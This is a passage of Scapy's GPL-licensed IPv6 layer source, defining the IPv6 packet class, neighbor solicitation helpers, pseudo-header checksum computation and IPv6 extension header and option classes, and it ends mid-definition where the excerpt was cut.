1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Guillaume Valadon <guedou@hongo.wide.ad.jp>
5# Copyright (C) Arnaud Ebalard <arnaud.ebalard@eads.net>
6
7# Cool history about this file: http://natisbad.org/scapy/index.html
8
9
10"""
11IPv6 (Internet Protocol v6).
12"""
13
14
15from hashlib import md5
16import random
17import socket
18import struct
19from time import gmtime, strftime
20
21from scapy.arch import get_if_hwaddr
22from scapy.as_resolvers import AS_resolver_riswhois
23from scapy.base_classes import Gen, _ScopedIP
24from scapy.compat import chb, orb, raw, plain_str, bytes_encode
25from scapy.consts import WINDOWS
26from scapy.config import conf
27from scapy.data import (
28 DLT_IPV6,
29 DLT_RAW,
30 DLT_RAW_ALT,
31 ETHER_ANY,
32 ETH_P_ALL,
33 ETH_P_IPV6,
34 MTU,
35)
36from scapy.error import log_runtime, warning
37from scapy.fields import (
38 BitEnumField,
39 BitField,
40 ByteEnumField,
41 ByteField,
42 DestIP6Field,
43 FieldLenField,
44 FlagsField,
45 IntField,
46 IP6Field,
47 LongField,
48 MACField,
49 MayEnd,
50 PacketLenField,
51 PacketListField,
52 ShortEnumField,
53 ShortField,
54 SourceIP6Field,
55 StrField,
56 StrFixedLenField,
57 StrLenField,
58 X3BytesField,
59 XBitField,
60 XByteField,
61 XIntField,
62 XShortField,
63)
64from scapy.layers.inet import (
65 _ICMPExtensionField,
66 _ICMPExtensionPadField,
67 _ICMP_extpad_post_dissection,
68 IP,
69 IPTools,
70 TCP,
71 TCPerror,
72 TracerouteResult,
73 UDP,
74 UDPerror,
75)
76from scapy.layers.l2 import (
77 CookedLinux,
78 Ether,
79 GRE,
80 Loopback,
81 SNAP,
82 SourceMACField,
83)
84from scapy.packet import bind_layers, Packet, Raw
85from scapy.sendrecv import sendp, sniff, sr, srp1
86from scapy.supersocket import SuperSocket
87from scapy.utils import checksum, strxor
88from scapy.pton_ntop import inet_pton, inet_ntop
89from scapy.utils6 import in6_getnsma, in6_getnsmac, in6_isaddr6to4, \
90 in6_isaddrllallnodes, in6_isaddrllallservers, in6_isaddrTeredo, \
91 in6_isllsnmaddr, in6_ismaddr, Net6, teredoAddrExtractInfo
92from scapy.volatile import RandInt, RandShort
93
94# Typing
95from typing import (
96 Optional,
97)
98
99if not socket.has_ipv6:
100 raise socket.error("can't use AF_INET6, IPv6 is disabled")
101if not hasattr(socket, "IPPROTO_IPV6"):
102 # Workaround for http://bugs.python.org/issue6926
103 socket.IPPROTO_IPV6 = 41
104if not hasattr(socket, "IPPROTO_IPIP"):
105 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119
106 socket.IPPROTO_IPIP = 4
107
108if conf.route6 is None:
109 # unused import, only to initialize conf.route6
110 import scapy.route6 # noqa: F401
111
112##########################
113# Neighbor cache stuff #
114##########################
115
116conf.netcache.new_cache("in6_neighbor", 120)
117
118
119@conf.commands.register
120def neighsol(addr, src, iface, timeout=1, chainCC=0):
121 """Sends and receive an ICMPv6 Neighbor Solicitation message
122
123 This function sends an ICMPv6 Neighbor Solicitation message
124 to get the MAC address of the neighbor with specified IPv6 address address.
125
126 'src' address is used as the source IPv6 address of the message. Message
127 is sent on 'iface'. The source MAC address is retrieved accordingly.
128
129 By default, timeout waiting for an answer is 1 second.
130
131 If no answer is gathered, None is returned. Else, the answer is
132 returned (ethernet frame).
133 """
134
135 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
136 d = inet_ntop(socket.AF_INET6, nsma)
137 dm = in6_getnsmac(nsma)
138 sm = get_if_hwaddr(iface)
139 p = Ether(dst=dm, src=sm) / IPv6(dst=d, src=src, hlim=255)
140 p /= ICMPv6ND_NS(tgt=addr)
141 p /= ICMPv6NDOptSrcLLAddr(lladdr=sm)
142 res = srp1(p, type=ETH_P_IPV6, iface=iface, timeout=timeout, verbose=0,
143 chainCC=chainCC)
144
145 return res
146
147
148@conf.commands.register
149def getmacbyip6(ip6, chainCC=0):
150 # type: (str, int) -> Optional[str]
151 """
152 Returns the MAC address of the next hop used to reach a given IPv6 address.
153
154 neighborCache.get() method is used on instantiated neighbor cache.
155 Resolution mechanism is described in associated doc string.
156
157 (chainCC parameter value ends up being passed to sending function
158 used to perform the resolution, if needed)
159
160 .. seealso:: :func:`~scapy.layers.l2.getmacbyip` for IPv4.
161 """
162 # Sanitize the IP
163 if isinstance(ip6, Net6):
164 ip6 = str(ip6)
165
166 # Multicast
167 if in6_ismaddr(ip6): # mcast @
168 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
169 return mac
170
171 iff, a, nh = conf.route6.route(ip6)
172
173 if iff == conf.loopback_name:
174 return "ff:ff:ff:ff:ff:ff"
175
176 if nh != '::':
177 ip6 = nh # Found next hop
178
179 mac = conf.netcache.in6_neighbor.get(ip6)
180 if mac:
181 return mac
182
183 res = neighsol(ip6, a, iff, chainCC=chainCC)
184
185 if res is not None:
186 if ICMPv6NDOptDstLLAddr in res:
187 mac = res[ICMPv6NDOptDstLLAddr].lladdr
188 else:
189 mac = res.src
190 conf.netcache.in6_neighbor[ip6] = mac
191 return mac
192
193 return None
194
195
196#############################################################################
197#############################################################################
198# IPv6 Class #
199#############################################################################
200#############################################################################
201
202ipv6nh = {0: "Hop-by-Hop Option Header",
203 4: "IP",
204 6: "TCP",
205 17: "UDP",
206 41: "IPv6",
207 43: "Routing Header",
208 44: "Fragment Header",
209 47: "GRE",
210 50: "ESP Header",
211 51: "AH Header",
212 58: "ICMPv6",
213 59: "No Next Header",
214 60: "Destination Option Header",
215 112: "VRRP",
216 132: "SCTP",
217 135: "Mobility Header"}
218
219ipv6nhcls = {0: "IPv6ExtHdrHopByHop",
220 4: "IP",
221 6: "TCP",
222 17: "UDP",
223 43: "IPv6ExtHdrRouting",
224 44: "IPv6ExtHdrFragment",
225 50: "ESP",
226 51: "AH",
227 58: "ICMPv6Unknown",
228 59: "Raw",
229 60: "IPv6ExtHdrDestOpt"}
230
231
232class IP6ListField(StrField):
233 __slots__ = ["count_from", "length_from"]
234 islist = 1
235
236 def __init__(self, name, default, count_from=None, length_from=None):
237 if default is None:
238 default = []
239 StrField.__init__(self, name, default)
240 self.count_from = count_from
241 self.length_from = length_from
242
243 def i2len(self, pkt, i):
244 return 16 * len(i)
245
246 def i2count(self, pkt, i):
247 if isinstance(i, list):
248 return len(i)
249 return 0
250
251 def getfield(self, pkt, s):
252 c = tmp_len = None
253 if self.length_from is not None:
254 tmp_len = self.length_from(pkt)
255 elif self.count_from is not None:
256 c = self.count_from(pkt)
257
258 lst = []
259 ret = b""
260 remain = s
261 if tmp_len is not None:
262 remain, ret = s[:tmp_len], s[tmp_len:]
263 while remain:
264 if c is not None:
265 if c <= 0:
266 break
267 c -= 1
268 addr = inet_ntop(socket.AF_INET6, remain[:16])
269 lst.append(addr)
270 remain = remain[16:]
271 return remain + ret, lst
272
273 def i2m(self, pkt, x):
274 s = b""
275 for y in x:
276 try:
277 y = inet_pton(socket.AF_INET6, y)
278 except Exception:
279 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
280 y = inet_pton(socket.AF_INET6, y)
281 s += y
282 return s
283
284 def i2repr(self, pkt, x):
285 s = []
286 if x is None:
287 return "[]"
288 for y in x:
289 s.append('%s' % y)
290 return "[ %s ]" % (", ".join(s))
291
292
293class _IPv6GuessPayload:
294 name = "Dummy class that implements guess_payload_class() for IPv6"
295
296 def default_payload_class(self, p):
297 if self.nh == 58: # ICMPv6
298 t = orb(p[0])
299 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query
300 return _niquery_guesser(p)
301 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages # noqa: E501
302 if t == 130 and len(p) >= 28:
303 # RFC 3810 - 8.1. Query Version Distinctions
304 return ICMPv6MLQuery2
305 return icmp6typescls.get(t, Raw)
306 return Raw
307 elif self.nh == 135 and len(p) > 3: # Mobile IPv6
308 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic)
309 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header
310 return IPv6ExtHdrSegmentRouting
311 return ipv6nhcls.get(self.nh, Raw)
312
313
314class IPv6(_IPv6GuessPayload, Packet, IPTools):
315 name = "IPv6"
316 fields_desc = [BitField("version", 6, 4),
317 BitField("tc", 0, 8),
318 BitField("fl", 0, 20),
319 ShortField("plen", None),
320 ByteEnumField("nh", 59, ipv6nh),
321 ByteField("hlim", 64),
322 SourceIP6Field("src"),
323 DestIP6Field("dst", "::1")]
324
325 def route(self):
326 """Used to select the L2 address"""
327 dst = self.dst
328 scope = None
329 if isinstance(dst, (Net6, _ScopedIP)):
330 scope = dst.scope
331 if isinstance(dst, (Gen, list)):
332 dst = next(iter(dst))
333 return conf.route6.route(dst, dev=scope)
334
335 def mysummary(self):
336 return "%s > %s (%i)" % (self.src, self.dst, self.nh)
337
338 def post_build(self, p, pay):
339 p += pay
340 if self.plen is None:
341 tmp_len = len(p) - 40
342 p = p[:4] + struct.pack("!H", tmp_len) + p[6:]
343 return p
344
345 def extract_padding(self, data):
346 """Extract the IPv6 payload"""
347
348 if self.plen == 0 and self.nh == 0 and len(data) >= 8:
349 # Extract Hop-by-Hop extension length
350 hbh_len = orb(data[1])
351 hbh_len = 8 + hbh_len * 8
352
353 # Extract length from the Jumbogram option
354 # Note: the following algorithm take advantage of the Jumbo option
355 # mandatory alignment (4n + 2, RFC2675 Section 2)
356 jumbo_len = None
357 idx = 0
358 offset = 4 * idx + 2
359 while offset <= len(data):
360 opt_type = orb(data[offset])
361 if opt_type == 0xc2: # Jumbo option
362 jumbo_len = struct.unpack("I", data[offset + 2:offset + 2 + 4])[0] # noqa: E501
363 break
364 offset = 4 * idx + 2
365 idx += 1
366
367 if jumbo_len is None:
368 log_runtime.info("Scapy did not find a Jumbo option")
369 jumbo_len = 0
370
371 tmp_len = hbh_len + jumbo_len
372 else:
373 tmp_len = self.plen
374
375 return data[:tmp_len], data[tmp_len:]
376
377 def hashret(self):
378 if self.nh == 58 and isinstance(self.payload, _ICMPv6):
379 if self.payload.type < 128:
380 return self.payload.payload.hashret()
381 elif (self.payload.type in [133, 134, 135, 136, 144, 145]):
382 return struct.pack("B", self.nh) + self.payload.hashret()
383
384 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6
385 return self.payload.hashret()
386
387 nh = self.nh
388 sd = self.dst
389 ss = self.src
390 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
391 # With routing header, the destination is the last
392 # address of the IPv6 list if segleft > 0
393 nh = self.payload.nh
394 try:
395 sd = self.addresses[-1]
396 except IndexError:
397 sd = '::1'
398 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 # noqa: E501
399 # could be anything from the original list ...
400 if 1:
401 sd = inet_pton(socket.AF_INET6, sd)
402 for a in self.addresses:
403 a = inet_pton(socket.AF_INET6, a)
404 sd = strxor(sd, a)
405 sd = inet_ntop(socket.AF_INET6, sd)
406
407 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
408 # With segment routing header (rh == 4), the destination is
409 # the first address of the IPv6 addresses list
410 try:
411 sd = self.addresses[0]
412 except IndexError:
413 sd = self.dst
414
415 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
416 nh = self.payload.nh
417
418 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
419 nh = self.payload.nh
420
421 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
422 foundhao = None
423 for o in self.payload.options:
424 if isinstance(o, HAO):
425 foundhao = o
426 if foundhao:
427 ss = foundhao.hoa
428 nh = self.payload.nh # XXX what if another extension follows ?
429
430 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
431 sd = inet_pton(socket.AF_INET6, sd)
432 ss = inet_pton(socket.AF_INET6, ss)
433 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() # noqa: E501
434 else:
435 return struct.pack("B", nh) + self.payload.hashret()
436
437 def answers(self, other):
438 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP
439 if self.nh in [4, 41]:
440 return self.payload.answers(other)
441 if isinstance(other, IPv6) and other.nh in [4, 41]:
442 return self.answers(other.payload)
443 if isinstance(other, IP) and other.proto in [4, 41]:
444 return self.answers(other.payload)
445 if not isinstance(other, IPv6): # self is reply, other is request
446 return False
447 if conf.checkIPaddr:
448 # ss = inet_pton(socket.AF_INET6, self.src)
449 sd = inet_pton(socket.AF_INET6, self.dst)
450 os = inet_pton(socket.AF_INET6, other.src)
451 od = inet_pton(socket.AF_INET6, other.dst)
452 # request was sent to a multicast address (other.dst)
453 # Check reply destination addr matches request source addr (i.e
454 # sd == os) except when reply is multicasted too
455 # XXX test mcast scope matching ?
456 if in6_ismaddr(other.dst):
457 if in6_ismaddr(self.dst):
458 if ((od == sd) or
459 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): # noqa: E501
460 return self.payload.answers(other.payload)
461 return False
462 if (os == sd):
463 return self.payload.answers(other.payload)
464 return False
465 elif (sd != os): # or ss != od): <- removed for ICMP errors
466 return False
467 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: # noqa: E501
468 # ICMPv6 Error message -> generated by IPv6 packet
469 # Note : at the moment, we jump the ICMPv6 specific class
470 # to call answers() method of erroneous packet (over
471 # initial packet). There can be cases where an ICMPv6 error
472 # class could implement a specific answers method that perform
473 # a specific task. Currently, don't see any use ...
474 return self.payload.payload.answers(other)
475 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
476 return self.payload.answers(other.payload)
477 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
478 return self.payload.answers(other.payload.payload)
479 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
480 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
481 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): # noqa: E501
482 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting # noqa: E501
483 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
484 return self.payload.answers(other.payload.payload)
485 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance # noqa: E501
486 return self.payload.payload.answers(other.payload)
487 else:
488 if (self.nh != other.nh):
489 return False
490 return self.payload.answers(other.payload)
491
492
493class IPv46(IP, IPv6):
494 """
495 This class implements a dispatcher that is used to detect the IP version
496 while parsing Raw IP pcap files.
497 """
498 name = "IPv4/6"
499
500 @classmethod
501 def dispatch_hook(cls, _pkt=None, *_, **kargs):
502 if _pkt:
503 if orb(_pkt[0]) >> 4 == 6:
504 return IPv6
505 elif kargs.get("version") == 6:
506 return IPv6
507 return IP
508
509
510def inet6_register_l3(l2, l3):
511 """
512 Resolves the default L2 destination address when IPv6 is used.
513 """
514 return getmacbyip6(l3.dst)
515
516
517conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
518
519
520class IPerror6(IPv6):
521 name = "IPv6 in ICMPv6"
522
523 def answers(self, other):
524 if not isinstance(other, IPv6):
525 return False
526 sd = inet_pton(socket.AF_INET6, self.dst)
527 ss = inet_pton(socket.AF_INET6, self.src)
528 od = inet_pton(socket.AF_INET6, other.dst)
529 os = inet_pton(socket.AF_INET6, other.src)
530
531 # Make sure that the ICMPv6 error is related to the packet scapy sent
532 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
533
534 # find upper layer for self (possible citation)
535 selfup = self.payload
536 while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
537 selfup = selfup.payload
538
539 # find upper layer for other (initial packet). Also look for RH
540 otherup = other.payload
541 request_has_rh = False
542 while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
543 if isinstance(otherup, IPv6ExtHdrRouting):
544 request_has_rh = True
545 otherup = otherup.payload
546
547 if ((ss == os and sd == od) or # < Basic case
548 (ss == os and request_has_rh)):
549 # ^ Request has a RH : don't check dst address
550
551 # Let's deal with possible MSS Clamping
552 if (isinstance(selfup, TCP) and
553 isinstance(otherup, TCP) and
554 selfup.options != otherup.options): # seems clamped
555
556 # Save fields modified by MSS clamping
557 old_otherup_opts = otherup.options
558 old_otherup_cksum = otherup.chksum
559 old_otherup_dataofs = otherup.dataofs
560 old_selfup_opts = selfup.options
561 old_selfup_cksum = selfup.chksum
562 old_selfup_dataofs = selfup.dataofs
563
564 # Nullify them
565 otherup.options = []
566 otherup.chksum = 0
567 otherup.dataofs = 0
568 selfup.options = []
569 selfup.chksum = 0
570 selfup.dataofs = 0
571
572 # Test it and save result
573 s1 = raw(selfup)
574 s2 = raw(otherup)
575 tmp_len = min(len(s1), len(s2))
576 res = s1[:tmp_len] == s2[:tmp_len]
577
578 # recall saved values
579 otherup.options = old_otherup_opts
580 otherup.chksum = old_otherup_cksum
581 otherup.dataofs = old_otherup_dataofs
582 selfup.options = old_selfup_opts
583 selfup.chksum = old_selfup_cksum
584 selfup.dataofs = old_selfup_dataofs
585
586 return res
587
588 s1 = raw(selfup)
589 s2 = raw(otherup)
590 tmp_len = min(len(s1), len(s2))
591 return s1[:tmp_len] == s2[:tmp_len]
592
593 return False
594
595 def mysummary(self):
596 return Packet.mysummary(self)
597
598
599#############################################################################
600#############################################################################
601# Upper Layer Checksum computation #
602#############################################################################
603#############################################################################
604
605class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
606 name = "Pseudo IPv6 Header"
607 fields_desc = [IP6Field("src", "::"),
608 IP6Field("dst", "::"),
609 IntField("uplen", None),
610 BitField("zero", 0, 24),
611 ByteField("nh", 0)]
612
613
614def in6_pseudoheader(nh, u, plen):
615 # type: (int, IP, int) -> PseudoIPv6
616 """
617 Build an PseudoIPv6 instance as specified in RFC 2460 8.1
618
619 This function operates by filling a pseudo header class instance
620 (PseudoIPv6) with:
621 - Next Header value
622 - the address of _final_ destination (if some Routing Header with non
623 segleft field is present in underlayer classes, last address is used.)
624 - the address of _real_ source (basically the source address of an
625 IPv6 class instance available in the underlayer or the source address
626 in HAO option if some Destination Option header found in underlayer
627 includes this option).
628 - the length is the length of provided payload string ('p')
629
630 :param nh: value of upper layer protocol
631 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
632 provided with all under layers (IPv6 and all extension headers,
633 for example)
634 :param plen: the length of the upper layer and payload
635 """
636 ph6 = PseudoIPv6()
637 ph6.nh = nh
638 rthdr = 0
639 hahdr = 0
640 final_dest_addr_found = 0
641 while u is not None and not isinstance(u, IPv6):
642 if (isinstance(u, IPv6ExtHdrRouting) and
643 u.segleft != 0 and len(u.addresses) != 0 and
644 final_dest_addr_found == 0):
645 rthdr = u.addresses[-1]
646 final_dest_addr_found = 1
647 elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
648 u.segleft != 0 and len(u.addresses) != 0 and
649 final_dest_addr_found == 0):
650 rthdr = u.addresses[0]
651 final_dest_addr_found = 1
652 elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
653 isinstance(u.options[0], HAO)):
654 hahdr = u.options[0].hoa
655 u = u.underlayer
656 if u is None:
657 warning("No IPv6 underlayer to compute checksum. Leaving null.")
658 return None
659 if hahdr:
660 ph6.src = hahdr
661 else:
662 ph6.src = u.src
663 if rthdr:
664 ph6.dst = rthdr
665 else:
666 ph6.dst = u.dst
667 ph6.uplen = plen
668 return ph6
669
670
671def in6_chksum(nh, u, p):
672 """
673 As Specified in RFC 2460 - 8.1 Upper-Layer Checksums
674
675 See also `.in6_pseudoheader`
676
677 :param nh: value of upper layer protocol
678 :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
679 provided with all under layers (IPv6 and all extension headers,
680 for example)
681 :param p: the payload of the upper layer provided as a string
682 """
683 ph6 = in6_pseudoheader(nh, u, len(p))
684 if ph6 is None:
685 return 0
686 ph6s = raw(ph6)
687 return checksum(ph6s + p)
688
689
690#############################################################################
691#############################################################################
692# Extension Headers #
693#############################################################################
694#############################################################################
695
696
697# Inherited by all extension header classes
698class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
699 name = 'Abstract IPv6 Option Header'
700 aliastypes = [IPv6, IPerror6] # TODO ...
701
702
703# IPv6 options for Extension Headers #
704
705_hbhopts = {0x00: "Pad1",
706 0x01: "PadN",
707 0x04: "Tunnel Encapsulation Limit",
708 0x05: "Router Alert",
709 0x06: "Quick-Start",
710 0xc2: "Jumbo Payload",
711 0xc9: "Home Address Option"}
712
713
714class _OTypeField(ByteEnumField):
715 """
716 Modified BytEnumField that displays information regarding the IPv6 option
717 based on its option type value (What should be done by nodes that process
718 the option if they do not understand it ...)
719
720 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options
721 """
722 pol = {0x00: "00: skip",
723 0x40: "01: discard",
724 0x80: "10: discard+ICMP",
725 0xC0: "11: discard+ICMP not mcast"}
726
727 enroutechange = {0x00: "0: Don't change en-route",
728 0x20: "1: May change en-route"}
729
730 def i2repr(self, pkt, x):
731 s = self.i2s.get(x, repr(x))
732 polstr = self.pol[(x & 0xC0)]
733 enroutechangestr = self.enroutechange[(x & 0x20)]
734 return "%s [%s, %s]" % (s, polstr, enroutechangestr)
735
736
737class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
738 name = "Scapy6 Unknown Option"
739 fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
740 FieldLenField("optlen", None, length_of="optdata", fmt="B"),
741 StrLenField("optdata", "",
742 length_from=lambda pkt: pkt.optlen)]
743
744 def alignment_delta(self, curpos): # By default, no alignment requirement
745 """
746 As specified in section 4.2 of RFC 2460, every options has
747 an alignment requirement usually expressed xn+y, meaning
748 the Option Type must appear at an integer multiple of x octets
749 from the start of the header, plus y octets.
750
751 That function is provided the current position from the
752 start of the header and returns required padding length.
753 """
754 return 0
755
756 @classmethod
757 def dispatch_hook(cls, _pkt=None, *args, **kargs):
758 if _pkt:
759 o = orb(_pkt[0]) # Option type
760 if o in _hbhoptcls:
761 return _hbhoptcls[o]
762 return cls
763
764 def extract_padding(self, p):
765 return b"", p
766
767
768class Pad1(Packet): # IPv6 Hop-By-Hop Option
769 name = "Pad1"
770 fields_desc = [_OTypeField("otype", 0x00, _hbhopts)]
771
772 def alignment_delta(self, curpos): # No alignment requirement
773 return 0
774
775 def extract_padding(self, p):
776 return b"", p
777
778
779class PadN(Packet): # IPv6 Hop-By-Hop Option
780 name = "PadN"
781 fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
782 FieldLenField("optlen", None, length_of="optdata", fmt="B"),
783 StrLenField("optdata", "",
784 length_from=lambda pkt: pkt.optlen)]
785
786 def alignment_delta(self, curpos): # No alignment requirement
787 return 0
788
789 def extract_padding(self, p):
790 return b"", p
791
792
793class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
794 name = "Router Alert"
795 fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
796 ByteField("optlen", 2),
797 ShortEnumField("value", None,
798 {0: "Datagram contains a MLD message",
799 1: "Datagram contains RSVP message",
800 2: "Datagram contains an Active Network message", # noqa: E501
801 68: "NSIS NATFW NSLP",
802 69: "MPLS OAM",
803 65535: "Reserved"})]
804 # TODO : Check IANA has not defined new values for value field of RouterAlertOption # noqa: E501
805 # TODO : Now that we have that option, we should do something in MLD class that need it # noqa: E501
806 # TODO : IANA has defined ranges of values which can't be easily represented here. # noqa: E501
807 # iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
808
809 def alignment_delta(self, curpos): # alignment requirement : 2n+0
810 x = 2
811 y = 0
812 delta = x * ((curpos - y + x - 1) // x) + y - curpos
813 return delta
814
815 def extract_padding(self, p):
816 return b"", p
817
818
819class RplOption(Packet): # RFC 6553 - RPL Option
820 name = "RPL Option"
821 fields_desc = [_OTypeField("otype", 0x63, _hbhopts),
822 ByteField("optlen", 4),
823 BitField("Down", 0, 1),
824 BitField("RankError", 0, 1),
825 BitField("ForwardError", 0, 1),
826 BitField("unused", 0, 5),
827 XByteField("RplInstanceId", 0),
828 XShortField("SenderRank", 0)]
829
830 def alignment_delta(self, curpos): # alignment requirement : 2n+0
831 x = 2
832 y = 0
833 delta = x * ((curpos - y + x - 1) // x) + y - curpos
834 return delta
835
836 def extract_padding(self, p):
837 return b"", p
838
839
840class Jumbo(Packet): # IPv6 Hop-By-Hop Option
841 name = "Jumbo Payload"
842 fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
843 ByteField("optlen", 4),
844 IntField("jumboplen", None)]
845
846 def alignment_delta(self, curpos): # alignment requirement : 4n+2
847 x = 4
848 y = 2
849 delta = x * ((curpos - y + x - 1) // x) + y - curpos
850 return delta
851
852 def extract_padding(self, p):
853 return b"", p
854
855
856class HAO(Packet): # IPv6 Destination Options Header Option
857 name = "Home Address Option"
858 fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
859 ByteField("optlen", 16),
860 IP6Field("hoa", "::")]
861
862 def alignment_delta(self, curpos): # alignment requirement : 8n+6
863 x = 8
864 y = 6
865 delta = x * ((curpos - y + x - 1) // x) + y - curpos
866 return delta
867
868 def extract_padding(self, p):
869 return b"", p
870
871
872_hbhoptcls = {0x00: Pad1,
873 0x01: PadN,
874 0x05: RouterAlert,
875 0x63: RplOption,
876 0xC2: Jumbo,
877 0xC9: HAO}
878
879
880# Hop-by-Hop Extension Header #
881
882class _OptionsField(PacketListField):
883 __slots__ = ["curpos"]
884
885 def __init__(self, name, default, cls, curpos, *args, **kargs):
886 self.curpos = curpos
887 PacketListField.__init__(self, name, default, cls, *args, **kargs)
888
889 def i2len(self, pkt, i):
890 return len(self.i2m(pkt, i))
891
892 def i2m(self, pkt, x):
893 autopad = None
894 try:
895 autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
896 except Exception:
897 autopad = 1
898
899 if not autopad:
900 return b"".join(map(bytes, x))
901
902 curpos = self.curpos
903 s = b""
904 for p in x:
905 d = p.alignment_delta(curpos)
906 curpos += d
907 if d == 1:
908 s += raw(Pad1())
909 elif d != 0:
910 s += raw(PadN(optdata=b'\x00' * (d - 2)))
911 pstr = raw(p)
912 curpos += len(pstr)
913 s += pstr
914
915 # Let's make the class including our option field
916 # a multiple of 8 octets long
917 d = curpos % 8
918 if d == 0:
919 return s
920 d = 8 - d
921 if d == 1:
922 s += raw(Pad1())
923 elif d != 0:
924 s += raw(PadN(optdata=b'\x00' * (d - 2)))
925
926 return s
927
928 def addfield(self, pkt, s, val):
929 return s + self.i2m(pkt, val)
930
931
932class _PhantomAutoPadField(ByteField):
933 def addfield(self, pkt, s, val):
934 return s
935
936 def getfield(self, pkt, s):
937 return s, 1
938
939 def i2repr(self, pkt, x):
940 if x:
941 return "On"
942 return "Off"
943
944
945class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
946 name = "IPv6 Extension Header - Hop-by-Hop Options Header"
947 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
948 FieldLenField("len", None, length_of="options", fmt="B",
949 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
950 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
951 _OptionsField("options", [], HBHOptUnknown, 2,
952 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
953 overload_fields = {IPv6: {"nh": 0}}
954
955
956# Destination Option Header #
957
958class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
959 name = "IPv6 Extension Header - Destination Options Header"
960 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
961 FieldLenField("len", None, length_of="options", fmt="B",
962 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1),
963 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
964 _OptionsField("options", [], HBHOptUnknown, 2,
965 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501
966 overload_fields = {IPv6: {"nh": 60}}
967
968
969# Routing Header #
970
971class IPv6ExtHdrRouting(_IPv6ExtHdr):
972 name = "IPv6 Option Header Routing"
973 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
974 FieldLenField("len", None, count_of="addresses", fmt="B",
975 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501
976 ByteField("type", 0),
977 ByteField("segleft", None),
978 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501
979 IP6ListField("addresses", [],
980 length_from=lambda pkt: 8 * pkt.len)]
981 overload_fields = {IPv6: {"nh": 43}}
982
983 def post_build(self, pkt, pay):
984 if self.segleft is None:
985 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:]
986 return _IPv6ExtHdr.post_build(self, pkt, pay)
987
988
989# Segment Routing Header #
990
991# This implementation is based on RFC8754, but some older snippets come from:
992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
993
994_segment_routing_header_tlvs = {
995 # RFC 8754 sect 8.2
996 0: "Pad1 TLV",
997 1: "Ingress Node TLV", # draft 06
998 2: "Egress Node TLV", # draft 06
999 4: "PadN TLV",
1000 5: "HMAC TLV",
1001}
1002
1003
1004class IPv6ExtHdrSegmentRoutingTLV(Packet):
1005 name = "IPv6 Option Header Segment Routing - Generic TLV"
1006 # RFC 8754 sect 2.1
1007 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs),
1008 ByteField("len", 0),
1009 StrLenField("value", "", length_from=lambda pkt: pkt.len)]
1010
1011 def extract_padding(self, p):
1012 return b"", p
1013
1014 registered_sr_tlv = {}
1015
1016 @classmethod
1017 def register_variant(cls):
